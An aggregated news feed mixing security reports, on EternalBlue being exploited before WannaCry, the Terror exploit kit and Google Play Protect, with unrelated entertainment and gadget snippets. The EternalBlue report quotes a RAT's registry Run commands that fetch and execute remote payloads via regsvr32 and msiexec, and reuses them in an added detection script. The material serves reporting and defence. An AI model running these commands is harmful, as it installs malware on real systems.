News & Updates

Is your router collecting data on your network?

Netgear last week pushed out a firmware update for its NightHawk R7000 wireless router that adds a remote data collection feature: it gathers the router’s analytics data and sends it to the company’s servers.

For now, the company has rolled out the firmware update only for its NightHawk R7000, but other router models will probably receive the update in

Source: http://feeds.feedburner.com/TheHackersNews

At least 3 different groups have been leveraging the NSA EternalBlue exploit weeks before the WannaCry attacks, here’s the evidence.

In recent days, security experts have discovered numerous attacks leveraging the same EternalBlue exploit used by the notorious WannaCry ransomware.

The Shadow Brokers hacker group released the exploit for the SMB vulnerability in April, but according to malware researchers, other threats used it as well, such as the Adylkuzz botnet, which has been active since April 24.

Security experts at Cyphort found evidence on a honeypot server that threat actors in the wild were already exploiting the SMB flaw in early May to deliver a stealth Remote Access Trojan (RAT) instead of ransomware.

The RAT did not show the network-worm capabilities of the WannaCry ransomware.

The malware is delivered from an IP (182.18.23.38) located in China.

“Once the exploitation is successful, the attacker will send an encrypted payload as a shellcode. The shellcode is encrypted via XOR with the key, “A9 CA 63 BA”. The shellcode has an embedded binary in it as shown below:” reads the analysis published by Cyphort. “The embedded DLL is basically a trojan which downloads additional malware and receives commands from its controller.”

Once it has infected a system, the malicious code closes port 445 to prevent other malware from abusing the same SMB flaw.

This aspect suggests the attacker was aware of the EternalBlue vulnerability.

“This is yet another indication that the malware is probably aware of the Eternal Blue vulnerability and is closing it.” continues the analysis. “The threat actors probably did not want other threats mingling with their activity. We believe that the group behind this attack is the same group that spreads Mirai via Windows Kaspersky discovered in February. We found similarities in terms of their IOCs.”

The RAT sets the following Registry Run entries to download and execute additional malware.

  • reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "start" /d "regsvr32 /u /s /i:http://js.mykings.top:280/v.sct scrobj.dll" /f
  • reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "start1" /d "msiexec.exe /i http://js.mykings.top:280/helloworld.msi /q" /f
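
Both Run entries above launch a signed Windows binary that fetches its real payload over HTTP, which is what a defender should alert on rather than the specific hostname. The following detection logic is an added example, not part of the Cyphort report or the original post; it runs over constructed "RegistryEvent|value path|data" lines (the format is invented for the example) and flags Run/RunOnce values that use regsvr32 with a remote scriptlet or msiexec with a remote package. The two malicious lines reuse the commands quoted above; the benign lines are made up to show the filter stays quiet on normal software.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# Constructed sample events (format invented for this example, loosely modelled on
# a registry "value set" telemetry line): RegistryEvent|<value path>|<value data>
SAMPLE_EVENTS = [
    r'RegistryEvent|HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\start|regsvr32 /u /s /i:http://js.mykings.top:280/v.sct scrobj.dll',
    r'RegistryEvent|HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\start1|msiexec.exe /i http://js.mykings.top:280/helloworld.msi /q',
    r'RegistryEvent|HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OneDrive|"C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background',
    r'RegistryEvent|HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Updater|msiexec.exe /i "C:\ProgramData\Vendor\update.msi" /qn',
]

# Only autostart locations are of interest for this rule.
RUN_KEY = re.compile(r'\\CurrentVersion\\Run(Once)?\\', re.IGNORECASE)
# regsvr32 asked to load a scriptlet from a URL and hand it to scrobj.dll
REGSVR32_REMOTE_SCT = re.compile(r'regsvr32(\.exe)?\b.*?/i:\s*https?://.*?\bscrobj\.dll', re.IGNORECASE)
# msiexec installing a package straight from a URL (a local path does not match)
MSIEXEC_REMOTE_PKG = re.compile(r'msiexec(\.exe)?\b.*?/i\s+https?://\S+', re.IGNORECASE)
# The URL itself, so a finding carries the host an analyst would pivot on.
URL = re.compile(r'https?://[^\s"]+', re.IGNORECASE)


@dataclass
class Finding:
    value_path: str
    technique: str
    url: str


def classify_run_value(value_path: str, data: str) -> Optional[Finding]:
    """Return a Finding when a Run/RunOnce value launches a remote payload, else None."""
    if not RUN_KEY.search(value_path):
        return None
    if REGSVR32_REMOTE_SCT.search(data):
        technique = 'regsvr32 remote scriptlet (scrobj.dll)'
    elif MSIEXEC_REMOTE_PKG.search(data):
        technique = 'msiexec remote MSI install'
    else:
        return None
    m = URL.search(data)
    return Finding(value_path, technique, m.group(0) if m else '')


def scan_events(lines: List[str]) -> List[Finding]:
    """Parse the sample event lines and collect suspicious autostart entries."""
    findings = []
    for line in lines:
        parts = line.split('|', 2)
        if len(parts) != 3 or parts[0] != 'RegistryEvent':
            continue  # not a registry event, or malformed line
        finding = classify_run_value(parts[1], parts[2])
        if finding:
            findings.append(finding)
    return findings


if __name__ == '__main__':
    for f in scan_events(SAMPLE_EVENTS):
        print(f'{f.value_path}: {f.technique} -> {f.url}')
```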

The malicious code attempts to delete a number of users and to terminate and/or delete various files or processes. The experts also noticed that it is connected to a remote access tool hosted on a Chinese website, ForShare 8.28.

The malware can be instructed by the C&C server to execute various commands, including screen monitoring, audio and video capture, keystroke logging, data transfer, file deletion, process termination, and downloading and executing files, among many other operations.

The report published by Cyphort included the Indicators of Compromise for this specific threat.

The fact that multiple groups were exploiting ETERNALBLUE weeks before WannaCry is also demonstrated by an analysis published by Secdo.

Secdo claims to have found evidence of ransomware abusing the EternalBlue flaw weeks before WannaCry emerged.

“Secdo has uncovered a new evasive attack that leaves no trace and has been infecting organizations using NSA exploits since the mid-April.” reads the analysis published by Secdo. “The ransomware is the most apparent payload, yet under the surface a more sophisticated attack occurred that would have gone unnoticed.”

EternalBlue SMB flaw

The researchers also reported that threat actors in the wild were using an EternalBlue-based worm to infect all machines in a compromised network and exfiltrate login credentials.

Recently experts at Heimdal discovered the UIWIX ransomware, a fileless malware exploiting the EternalBlue vulnerability.

Like WannaCry, UIWIX exploits the same vulnerability in the Windows SMB protocol, but the new threat runs in the memory of the infected system after exploiting EternalBlue.

In late April, the experts at Secdo also discovered another attack exploiting the EternalBlue vulnerability; it was associated with a Chinese threat actor that used a botnet to distribute a backdoor.

“It begins by spawning a thread inside of lsass.exe, similar to the credential theft attack, only instead of remaining purely in-memory, the initial payload connects back to a Chinese C2 server on port 998 (2.x.x.x) and downloads a known root-kit backdoor (based on Agony).” reads the analysis published by Secdo.

“The file is dropped in %programdata% under the name 666.exe. Existing NG-AV vendors that were present were able to block 666.exe from running, but remained oblivious to the malicious thread running inside of lsass.exe.”

Summarizing, at least 3 different groups were leveraging the NSA exploit weeks before WannaCry. This means that a significant portion of the security community either failed to monitor the threat or failed to share information about the attacks they had observed.

The success of the EternalBlue attacks is a failure of our current model of cyber security.


Pierluigi Paganini

(Security Affairs – WannaCry, EternalBlue vulnerability)


The post At least 3 different groups have been leveraging the NSA EternalBlue exploit, what went wrong? appeared first on Security Affairs.

Source: Security affairs

Experts from the Talos team discovered changes made to the Terror exploit kit (EK) that allow it to fingerprint victims and target specific vulnerabilities.

Recent changes made to the Terror exploit kit (EK) allow it to fingerprint victims and target specific vulnerabilities instead of carpet bombing the victims with many exploits at the same time, Talos researchers discovered.

Last week I reported on the improvements to the Stegano exploit kit; today we look at the Terror exploit kit, which now includes fingerprinting capabilities.

The Terror Exploit Kit first appeared in the threat landscape in January 2017, and in April experts observed a significant increase in hacking campaigns leveraging the EK.

Because of similarities with Sundown EK, experts at MalwareBytes initially thought that Terror EK was simply a new variant of Sundown, but further investigation revealed that it actually came from a different actor (it was dubbed Terror EK by Trustwave).

The Terror EK was advertised on various underground forums by a hacker with the online moniker @666_KingCobra, who offers it for sale under different names (i.e. Blaze, Neptune, and Eris).

Experts at Malwarebytes Labs said that the Terror EK was used in a malvertising campaign distributing the Smoke Loader through Internet Explorer, Flash, and Silverlight exploits.

The Terror EK was also involved in a campaign using a different landing page that distributes the Andromeda malware.

The compromised websites redirected visitors to the exploit kit landing page with a server-side HTTP 302 redirect, triggered by injected script.

The powerful exploit kit was observed carpet bombing victims with many exploits at the same time, but now experts from the Talos group have observed a significant change in its tactics. The news of the day is that the Terror Exploit Kit has been improved with new exploits and now implements fingerprinting. The latter allows the EK to determine which exploit to use to compromise the target system.

The new variant of the Terror Exploit Kit was able to determine the specific OS running on the victim’s PC, the browser version, installed security patches and plugins.

The researchers were served different files when accessing the site via different browsers, such as Internet Explorer 11 or Internet Explorer 8.

Talos malware researchers identified a potentially compromised legitimate website that operates as a malware gate. The website was initially used to redirect visitors to a RIG landing page; after a single day of analysis, the gate switched to the Terror exploit kit.

“Terror seems to constantly evolving. In this campaign it has added further exploits and no longer carpet bombs the victim. Instead it evaluates data regarding the victim’s environment and then picks potentially successful exploits depending on the victim’s operating system, patch level, browser version and installed plugins. This makes it harder for an investigator to fully uncover which exploits they have.” reads the analysis published by Talos.
“It is interesting to note that the adversaries are using an URL parameter in cleartext for the vulnerability they are going to exploit, e.g. cve2013-2551 = cve20132551 in the URL.”

The compromised website discovered by Talos experts redirects users to the EK landing page by using an HTTP 302 Moved Temporarily response, like previous campaigns.

Terror Exploit Kit

The page uses obfuscated Javascript code to determine the victim’s browser environment, then uses the return value of this function to submit a hidden form called ‘frm’.

“As mentioned in the executive overview, it uses some obfuscated Javascript code to evaluate the victim’s browser environment, for example it tries to get version information about the following plugins: ActiveX, Flash, PDF reader, Java, Silverlight, QuickTime, etc. Then it uses the return value of this function to submit the hidden form called ‘frm’.” continues the analysis.

The EK also uses cookie-based authentication for downloading the exploits, which prevents third parties from accessing them, the security researchers discovered. This approach not only prevents investigators from learning from where or how the victims were infected, but also stops competitors from stealing the exploits.
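
The cleartext CVE parameter Talos quoted (cve2013-2551 = cve20132551) and the 302 redirect from the compromised site are both visible in ordinary web proxy logs, which gives a defender a cheap detection. The script below is an added example, not Talos code or part of the original post: it runs over constructed proxy log lines (format, hosts and paths are invented; only the parameter style comes from the report), flags any request whose query string names a CVE in that form, and notes whether the same client had just received a 302 from a different host.

```python
import re
from typing import Dict, List, Optional
from urllib.parse import parse_qsl, urlsplit

# Constructed proxy log lines: "<client> <status> <method> <url> <referer or ->".
# Line 2 carries the cve2013-2551=cve20132551 parameter style quoted by Talos;
# lines 3 and 4 contain similar digits in harmless places and must not fire.
SAMPLE_LOG = [
    "10.0.0.7 302 GET http://compromised-site.example/news.html -",
    "10.0.0.7 200 GET http://gate.example/land.php?cve2013-2551=cve20132551&frm=1 http://compromised-site.example/news.html",
    "10.0.0.9 200 GET http://blog.example/post?id=2013-2551 -",
    "10.0.0.9 200 GET http://cdn.example/lib.js?v=20132551 -",
]

# Parameter name of the form cveYYYY-NNNN (four or more trailing digits).
CVE_NAME = re.compile(r'^cve(\d{4})-(\d{4,})$', re.IGNORECASE)


def cve_parameter(url: str) -> Optional[str]:
    """Return the CVE id when a query parameter is named cveYYYY-NNNN and its value
    repeats the same id without the hyphen; otherwise None."""
    for name, value in parse_qsl(urlsplit(url).query, keep_blank_values=True):
        m = CVE_NAME.match(name)
        if m and value.lower() == f'cve{m.group(1)}{m.group(2)}':
            return f'CVE-{m.group(1)}-{m.group(2)}'
    return None


def find_ek_requests(lines: List[str]) -> List[Dict[str, str]]:
    """Flag requests carrying a cleartext CVE parameter and record whether the
    client arrived through a 302 served by a different host (a gate)."""
    last_302: Dict[str, str] = {}  # client -> host that last answered 302
    hits: List[Dict[str, str]] = []
    for line in lines:
        client, status, _method, url, _referer = line.split(' ', 4)
        host = urlsplit(url).hostname or ''
        if status == '302':
            last_302[client] = host
            continue
        cve = cve_parameter(url)
        if cve is None:
            continue
        gate = last_302.get(client, '')
        hits.append({
            'client': client,
            'host': host,
            'cve': cve,
            'redirected_from': gate if gate and gate != host else '',
        })
    return hits


if __name__ == '__main__':
    for hit in find_ek_requests(SAMPLE_LOG):
        print(hit)
```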

“We have seen that the exploit kit market is experiencing an ongoing change. Big players in this market disappear while new ones show up. The new players are fighting for customers by constantly improving their quality and techniques. They modify these techniques on an ongoing basis to improve their capability to bypass security tools. This clearly shows how important it is to make sure that all your systems are up to date,” concluded Talos.


Pierluigi Paganini

(Security Affairs – Terror Exploit Kit, hacking)


The post Experts discovered that the Terror Exploit Kit now includes fingerprinting capabilities appeared first on Security Affairs.

Source: Security affairs

Survivor: Game Changers Season 34 finale is coming closer. The Internet is buzzing with speculation on who will win this season. Out of the final six, Sarah Lacina seems to be a strong contender as the Season 34 winner. Find out why. Those who have followed the Survivor series will remember Lacina has played this game before. […]

The post ‘Survivor: Game Changers’ Season 34 Finale Spoilers: Sarah Lacina Might Win; Here’s Why? appeared first on MobiPicker.

Source: http://www.mobipicker.com/feed/

The Voice 2017 winner will be announced on May 23. But before the results are out on Tuesday, the previous day, on May 22, fans will witness all the Top 4 contestants performing. Read to know more details about the season 12 finale and what the winner will get. What Will Happen On The Voice […]

The post ‘The Voice’ 2017 Winner Prize, Air Date: Everything To Know About Season 12 Finale appeared first on MobiPicker.

Source: http://www.mobipicker.com/feed/

While everyone is waiting eagerly for Supercell to announce the next BIG update for Clash of Clans, there is bad news for some iOS users. The developer has announced that it is ending support for older Apple devices running older iOS versions. Supercell was expected to bring a host of new features […]

The post Next Clash of Clans BIG Update Has A Bad News For Apple Users Who Own Devices Running iOS Version Lower Than 7.x appeared first on MobiPicker.

Source: http://www.mobipicker.com/feed/

The BLUBOO S1 bezel-less concept phone inspired by Xiaomi MI MIX garnered a lot of attention at the recently held Global Source Fair 2017 event in Hong Kong. The smartphone sports a premium appeal, packed with impressive specs and it will be coming with affordable pricing. The first official renders of BLUBOO S1 had appeared […]

The post BLUBOO S1 Bezel-less Design Gets Exposed as Launch Nears appeared first on MobiPicker.

Source: http://www.mobipicker.com/feed/

Google is rolling out a new protection system called Google Play Protect, it is a machine-learning system to protect Android users.

Good news for Android users, Google has introduced another security defense system, called Google Play Protect, to protect the devices running its mobile OS.

Google already uses several security measures to protect smartphones, such as Verify Apps and the Bouncer service. However, once apps were uploaded to the Play Store and installed on a device, Google was not able to monitor their behavior and detect the malicious ones.

Google Play Protect

Google Play Protect uses machine learning and app usage analysis to identify malicious activity on the mobile device.

The new system is integrated into the Google Play Store app, which means it is transparent to end users, who do not need to install or enable it on their devices.

“Google Play Protect continuously works to keep your device, data and apps safe. It actively scans your device and is constantly improving to make sure you have the latest in mobile security. Your device is automatically scanned around the clock, so you can rest easy.” reads the description published by Google.

Google Play Protect implements the following features:

  • App scanning
  • Anti-Theft Measures
  • Browser Protection

Google Play Protect service will be rolling out to all the Android mobile devices over the coming weeks.

App scanning is an always-on service on devices; it scans 50 billion apps each day across a billion Android mobile devices to detect malicious applications.

Google Play Protect also monitors mobile apps that users have installed from third-party stores.

The machine learning algorithms Google implemented in its protection system compare app behavior and identify any behavior that matches malicious patterns.

Of course, the machine learning system is regularly updated to identify and mitigate new cyber threats.

When the system detects a malicious app, it warns the user or even disables the app.

“With more than 50 billion apps scanned every day, our machine learning systems are always on the lookout for new risks, identifying potentially harmful apps and keeping them off your device or removing them. All Google Play apps go through a rigorous security analysis even before they’re published on the Play Store—and Play Protect warns you about bad apps that are downloaded from other sources too.” states a blog post published by Google. “Play Protect watches out for any app that might step out of line on your device, keeping you and every other Android user safe.”

The new system also implements anti-theft measures: the Android Device Manager has been replaced with Find My Device, which allows users to locate lost and misplaced devices. The feature is available through the user’s browser or from any other mobile device, and it also allows users to remotely wipe data on the lost device.

Another interesting feature is Safe Browsing in Chrome, through which Google Play Protect protects users while they browse.

The feature will block malicious websites that were designed to deliver malicious code on the mobile devices.


Pierluigi Paganini

(Security Affairs – Google Play Protect, Android)


The post Google is rolling out Google Play Protect, a machine-learning system to protect Android users appeared first on Security Affairs.

Source: Security affairs

Chatting up MoonExpress co-founder and chairman Naveen Jain (video link)

NEW ORLEANS—The day before we talked with Moon Express co-founder and chairman Naveen Jain, he sat on the Collision Conference mainstage next to a HoloLens-clad Robert Scoble. The successful investor Jain and the enthusiastic tech-evangelist Scoble chatted about “Startups as a Superpower,” exploring what it means if a private business—and not another nation-state—becomes the fourth entity to reach the Moon. And while the challenge definitely carries an inherent amount of glory, Jain believes a startup will have the next Armstrong moment for one familiar reason.

“[Successful entrepreneurs] have to look at what problems we want to solve—tech is a means to an end, and profit is a motivator,” he said. “If I want to create a $10 billion business, I need to solve a problem that affects at least one billion people.”


Source: http://feeds.arstechnica.com/arstechnica/index/

Andrew Cunningham

We live in uncertain times, but when it comes to laptops, we’re actually pretty spoiled these days. The low-end still has plenty of junky machines, but buying good, thoughtfully designed computers for $700 and up is also easier than ever.

That means that sweating the details is more important than ever. A thin-and-light design, a nice IPS screen, a non-terrible keyboard and trackpad, and a good (and/or forward-looking) port selection can all be expected from a high-end laptop these days. So purchasing decisions and recommendations increasingly come down to the little things.


Source: http://feeds.arstechnica.com/arstechnica/index/